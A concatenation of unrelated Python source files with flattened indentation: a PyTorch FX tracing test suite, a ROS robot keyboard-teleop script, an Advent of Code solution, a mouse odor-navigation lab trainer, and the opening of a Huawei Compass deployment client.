check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
keyboard_teleop.py
|
#!/usr/bin/env python
# Author: Silvia Knappe
# Control movo with keyboard teleop, moves base and torso!
import rospy
from geometry_msgs.msg import Twist
from movo.system_defines import TRACTOR_REQUEST
from movo_msgs.msg import ConfigCmd, LinearActuatorCmd
from sensor_msgs.msg import JointState
import sys, select, termios, tty, threading
class KeyboardTeleop:
def __init__(self):
self.msg = """
Use the keyboard to move around!
--------------------------------
W
A D
S
to translate
------------
R
Q E
F
to rotate to move torso
--------------------------------
"""
self.basemoves = {
'w':[1,0,0],
'a':[0,1,0],
's':[-1,0,0],
'd':[0,-1,0],
'q':[0,0,1],
'e':[0,0,-1]
}
self.torsomoves = {
'r' : .002,
'f' : -.002
}
self.base_pub = rospy.Publisher('/movo/cmd_vel', Twist, queue_size=1)
self.cfg_cmd = ConfigCmd()
self.cfg_pub = rospy.Publisher('/movo/gp_command', ConfigCmd, queue_size=1)
self.torso_pub = rospy.Publisher('/movo/linear_actuator_cmd', LinearActuatorCmd, queue_size=1)
self.r = rospy.Rate(10)
self.thread = threading.Thread(target=self.setGP)
self.thread_r = rospy.Rate(1)
self.kill = False
self.current_pos = None
rospy.Subscriber('/movo/linear_actuator/joint_states', JointState, self.joint_state_cb)
self.settings = termios.tcgetattr(sys.stdin)
def joint_state_cb(self, msg):
assert msg.name[0] == 'linear_joint'
if self.current_pos is None:
self.current_pos = msg.position[0]
def getKey(self):
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old)
return ch
def setGP(self):
while not rospy.is_shutdown() and not self.kill:
self.cfg_cmd.gp_cmd = 'GENERAL_PURPOSE_CMD_SET_OPERATIONAL_MODE'
self.cfg_cmd.gp_param = TRACTOR_REQUEST
self.cfg_cmd.header.stamp = rospy.get_rostime()
self.cfg_pub.publish(self.cfg_cmd)
self.thread_r.sleep()
def start(self):
print self.msg
self.thread.start()
while not rospy.is_shutdown():
try:
twist = Twist()
lincmd = LinearActuatorCmd()
key = self.getKey()
v_x = 0
v_y = 0
a_z = 0
torso_dz = 0
if key in self.basemoves:
v_x = self.basemoves[key][0]
v_y = self.basemoves[key][1]
a_z = self.basemoves[key][2]
elif key in self.torsomoves:
torso_dz = self.torsomoves[key]
else:
v_x = 0
v_y = 0
a_z = 0
torso_dz = 0
if (key == '\x03'):
print "Goodbye!"
self.kill = True
break
twist.linear.x = v_x
twist.linear.y = v_y
twist.angular.z = a_z
self.current_pos += torso_dz
lincmd.desired_position_m = self.current_pos
self.torso_pub.publish(lincmd)
self.base_pub.publish(twist)
self.current_pos = None
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.settings)
except Exception as e:
print(e)
if __name__ == "__main__":
rospy.init_node('keyboard_teleop')
kt = KeyboardTeleop()
kt.start()
|
main_part2.py
|
#!/usr/bin/env python
import threading
import time
from queue import Queue
lock = threading.Lock()
state = {
0: {
'is_waiting': False,
'q': Queue()
},
1: {
'is_waiting': False,
'q': Queue()
}
}
def get_value(val, registers):
try:
return int(val)
except:
try:
return get_value(registers[val], registers)
except:
print(registers)
def play(instructions, prog_id):
i = 0
registers = {'p': prog_id}
sending_values = 0
other_prog_id = (prog_id + 1) % 2
while i < len(instructions):
instruction = instructions[i].strip()
command = instruction[:3]
register = instruction[4]
value = instruction[6:]
if not register in registers:
registers[register] = 0
if command == 'snd':
lock.acquire()
value = get_value(register, registers)
state[other_prog_id]['q'].put(value)
state[other_prog_id]['is_waiting'] = False
sending_values += 1
lock.release()
elif command == 'set':
registers[register] = value
elif command == 'add':
val = get_value(value, registers)
registers[register] = get_value(register, registers) + val
elif command == 'mul':
val = get_value(value, registers)
registers[register] = get_value(register, registers) * val
elif command == 'mod':
val = get_value(value, registers)
registers[register] = get_value(register, registers) % val
elif command == 'rcv':
# Deadlock detection...
if(state[prog_id]['q'].qsize() == 0):
lock.acquire()
state[prog_id]['is_waiting'] = True
lock.release()
while(True):
lock.acquire()
if not state[prog_id]['is_waiting']:
print ("NOT WAITING ANYMORE \n %s" % state)
lock.release()
break
if state[other_prog_id]['is_waiting']:
print ("DEADLOCK STATE \n %s" % str(state))
print ("PROGRAM %d SENT %d VALUES" % (prog_id, sending_values))
lock.release()
return
lock.release()
lock.acquire()
registers[register] = state[prog_id]['q'].get()
lock.release()
elif command == 'jgz':
if get_value(register, registers) > 0:
i += get_value(value, registers)
continue
i+=1
if __name__ == '__main__':
f = open('/Users/kosta/dev/advent-of-code-17/day18/input.txt', 'r')
instructions = f.readlines()
f.close()
t1 = threading.Thread(target=play, args=(instructions,0))
t1.start()
t2 = threading.Thread(target=play, args=(instructions,1))
t2.start()
t1.join()
t2.join()
|
fmos_trainer#2_for_non-spatial_DONTUSE.py
|
'''
FMON Trainer 2 - Freely Moving Odor Navigation - ODOR ASSOCIATION
Written: Teresa Findley, tmfindley15@gmail.com
Last Updated: 9/23/17
--Records tracking data via OSC from custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmon_preferences_bonsai import *
import fmon_datamgt, fmon_tracking, fmon_serial
##INITIATE VARIABLES
session_num = 1; trial_num = 1; state = 1;
port_val = leftport; leftcount = 0; rightcount = 0; nosepokecount = 0; msg = 0
last_occupancy = 0; section_occupancy = 0; concentration_setting = 0; response = 1; prep_odor = True; iti_delay = iti_correct; #trial information
correct0=0; total0=0; correct0L=0; total0L=0; correct0R=0; total0R=0;
odor_calibration = np.genfromtxt('Z:/FMON_Project/data/olfactometercalibration.txt', delimiter = ',') #odor calibration array
datapath,session_num = fmon_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
##START UP PROCEDURES
section,section_center=fmon_tracking.calc_partitions() #online tracking: gridline deliniation
fmon_serial.close_all_valves() #turn off all hardware
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab')
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab')
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()];
session_start = timer() #session timer
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
while ard.inWaiting() > 0: #check nosepoke status
msg = fmon_serial.nose_poke_status(msg)
if timer() - session_start >= session_length:
fmon_serial.close_all_valves()
reasonforend = "Auto Session End"
break
#Online Tracking
nose = [qnosex.get(),qnosey.get()]; #check nose position
section_occupancy = fmon_tracking.detect_mouse_partitions(nose,section_center,
section_occupancy) #section occupancy
if show_active_stats == True: #online trial statistics
frame = cv2.imread('Z:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
fraction_correct = "Total: "+str(correct0)
fraction_left = "Left: "+str(correct0L)
fraction_right = "Right: "+str(correct0R)
#Stats Display
cv2.putText(frame,'Percent Correct', (130,(height/2)-40), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_correct, (80,(height/2)-20), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_left,(80,height/2),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.putText(frame,fraction_right,(80,(height/2)+20),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.imshow('Session Statistics',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
fmon_serial.close_all_valves()
reasonforend = "Manual Exit"
break
# [State 1] TRIAL INITIATION
if state == 1:
if prep_odor == True:
low_valve, correctpoke,nameoftrialtype,correctindex,incorrectindex = fmon_datamgt.trial_values(port_val)
active_valve = 1
#Set MFC Settings to Fit Non-Spatial
HairR = odor_calibration[1,0]; Hn2R = odor_calibration[1,1]
HairL = odor_calibration[1,2]; Hn2L = odor_calibration[1,3]
LairR = odor_calibration[1,4]; Ln2R = odor_calibration[1,5]
LairL = odor_calibration[1,6]; Ln2L = odor_calibration[1,7]
activevial = odor_vial; lowvial = odor_vial
#Turn on MFCs
tnsy.write("MFC " + str(active_valve) + " " + str(MFC_air) + " " + str(HairR) + "\r")
tnsy.write("MFC " + str(active_valve) + " " + str(MFC_n2) + " " + str(Hn2R) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(HairL) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Hn2L) + "\r")
if port_val == 1:
tnsy.write("vialOn " + str(active_valve) + " " + str(odor_vial) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(odor_vial) + "\r")
if active_valve == 2:
tnsy.write("vialOn " + str(active_valve) + " " + str(odor_vial2) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(odor_vial2) + "\r")
iti_timeout_start = math.floor(timer()) #start vial timer
prep_odor = False #odor has been decided
if (math.floor(timer()) >= math.floor(iti_timeout_start + iti_delay)): #vial mixing timer
if msg == 3:
tstart = timer() - session_start; #timestamp trial start (in ms)
tnsy.write("valve " + str(port_val) + " 1 on\r") #turn on FVs
tnsy.write("valve " + str(low_valve) + " 1 on\r")
state = 2 #update trial variables
print("Trial " + str(trial_num) + " Activated: " + nameoftrialtype) #report trial start
# [State 2] TRIAL DECISION
if state == 2:
#Frame Count of Section Occupancy
if (section_occupancy == last_occupancy):
if (section_occupancy == correctindex):
counter = counter + 1
else: counter = 0; last_occupancy = section_occupancy
else: counter = 0; last_occupancy = section_occupancy
#Decision Status
if (counter == count_requirement):
print("Response registered: ") #report response
tnsy.write("valve " + str(port_val) + " 1 off\r") #turn off final valves
tnsy.write("valve " + str(low_valve) + " 1 off\r")
state = 3; counter = 0; #update trial statistics
# [State 3] REWARD DELIVERY
if state == 3:
if port_val == leftport:
if msg == 2:
total0 = total0 + 1; total0L = total0L + 1; correct0 = correct0 + 1; correct0L = correct0L + 1
fmon_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmon_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = rightport #update trial variables
if port_val == rightport:
if msg == 1:
total0 = total0 + 1; total0R = total0R + 1; correct0 = correct0 + 1; correct0R = correct0R + 1
fmon_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmon_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = leftport #update trial variables
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(input("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
#Close All Data Files
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
##EXIT PROGRAM
fmon_serial.close_all_valves(); cv2.destroyAllWindows(); ard.close(); tnsy.close()
fraction_correct = "T: "+str(correct0)
fraction_left = "L: "+str(correct0L)
fraction_right = "R: "+str(correct0R)
print fraction_correct
print fraction_left
print fraction_right
performance_report = "Total Trials: " + str(correct0)
#Write Video Locator
fmon_datamgt.write_vidlocator(video_file,localtime)
fmon_datamgt.record_notes(notes_file,session_num,localtime,notepad,performance_report)
|
client.py
|
#!/usr/bin/env python
#
# Copyright 2014 Huawei Technologies Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""binary to deploy a cluster by compass client api."""
import os
import re
import socket
import sys
import time
import yaml
import netaddr
import requests
import json
import itertools
import threading
from collections import defaultdict
from restful import Client
ROLE_UNASSIGNED = True
ROLE_ASSIGNED = False
import log as logging
LOG = logging.getLogger(__name__)
from oslo_config import cfg
CONF = cfg.CONF
def byteify(input):
if isinstance(input, dict):
return dict([(byteify(key),byteify(value)) for key,value in input.iteritems()])
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
opts = [
cfg.StrOpt('compass_server',
